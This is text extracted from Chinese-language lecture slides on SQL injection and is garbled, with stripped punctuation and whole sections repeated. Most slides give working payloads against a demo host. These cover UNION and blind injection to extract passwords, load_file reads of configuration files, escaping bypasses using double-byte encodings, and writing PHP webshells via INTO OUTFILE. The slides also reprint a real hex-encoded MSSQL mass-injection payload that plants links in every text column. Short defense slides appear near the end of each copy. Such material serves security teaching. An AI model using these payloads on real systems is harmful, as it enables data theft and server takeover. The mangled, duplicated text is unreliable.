SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection - 請試想這段程式碼有什麼問題
SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=
bull httpwwwhackdemocomgetUserphpid=9999999
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=2
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=
bull httpwwwhackdemocomgetUserphpid=9999999
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=2
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
